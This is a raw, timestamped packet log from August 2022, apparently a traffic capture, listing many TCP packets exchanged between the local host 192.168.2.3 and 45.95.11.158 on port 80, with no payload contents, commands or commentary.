Aug 23, 2022 03:42:47.532489061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532516956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532572031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532588959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532632113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532640934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532680988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.562372923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562408924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562427998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562443018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562517881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.562561989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.562648058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562665939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.562846899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.563391924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563411951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563427925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563446045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563463926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.563484907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.563682079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563699961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563715935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563731909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.563739061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.563771963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564116001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564152002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564172983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564193964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564208031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564214945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564237118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564258099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564265013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564270973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564280033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564306021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564325094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564373016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564393997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564414024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564425945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564436913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564444065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564450026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564457893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564480066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564495087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564518929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564537048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564573050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564594030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564615011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564624071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564636946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564640045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564656019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564657927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564680099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564693928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564701080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564713955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564723015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564733982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564749002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564754009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564770937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564778090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564794064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564795017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564817905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564825058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564841986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564861059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564899921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564922094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564941883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564951897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564963102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.564970016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564977884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.564985991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565006018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565011978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565033913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565052986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565067053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565088034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565108061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565113068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565129995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565150023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565171003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.565186977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565191031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565192938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565200090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.565207958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566005945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566030025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566050053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566063881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566087008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566102028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566268921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566292048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566313028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566329002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566334009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566356897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566363096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566368103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566380024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566385984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566401958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566402912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566422939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566442966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566451073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566468000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566488981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566488981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566509962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566510916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566528082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566534042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566550016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566555977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566577911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566581011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566596985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566601038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566622972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566622972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566641092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566642046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.566658974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.566684961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.587152004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587198019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587234020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587270975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587305069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587308884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.587341070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.587342978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587372065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.587493896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.587527037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.587580919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.588388920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.588486910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596488953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596533060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596580982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596638918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596672058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596678972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596709013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596719980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596743107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596771955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596776009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596817017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596837997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596867085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596869946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596911907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596925020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.596965075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.596973896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597013950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597017050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597064018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597296953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597352028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597381115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597393036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597414017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597465992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597480059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597507000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597517014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597553968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597554922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597601891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597603083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597642899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597651958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597682953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597692966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597731113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597737074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597778082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597785950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597820044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597834110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597873926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.597876072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.597924948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598386049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598448992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598481894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598504066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598521948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598576069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598577976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598628044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598634005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598687887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598705053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598758936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598773956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598829985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598833084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598881960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598905087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.598959923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.598979950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599039078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599061966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599095106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599100113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599159956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599179029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599227905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599237919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599280119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599296093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599390030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599411964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599450111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599487066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599546909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599570036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599627018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599631071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599684954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599694967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599751949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599761009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599813938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599838972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599915981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599915028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.599976063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.599977970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600030899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600040913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600112915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600143909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600157976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600186110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600230932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600236893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600289106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600296974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600347042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600363970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600410938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600414038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600460052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600481033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600528002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600543022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600594044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600594997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600642920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600665092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600707054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600716114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600749969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600764036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600825071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600836992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600883961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.600892067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.600929976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.618745089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.618884087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.618952036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.618980885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.618989944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619024992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619029045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619033098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619044065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619081974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619086027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619126081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619127035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619163990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619167089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619215012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619267941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619313002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619317055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619363070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619374037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619417906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619427919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619472980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619477034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619514942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619515896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619543076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619561911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619579077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619590044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619622946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619625092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619662046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619663954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619695902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619707108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619739056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619744062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619790077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619793892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619832039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619837999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619859934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619874001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619895935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619898081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619935989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.619937897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619982958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.619986057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620038986 CEST	49774	80	192.168.2.3	45.95.11.158
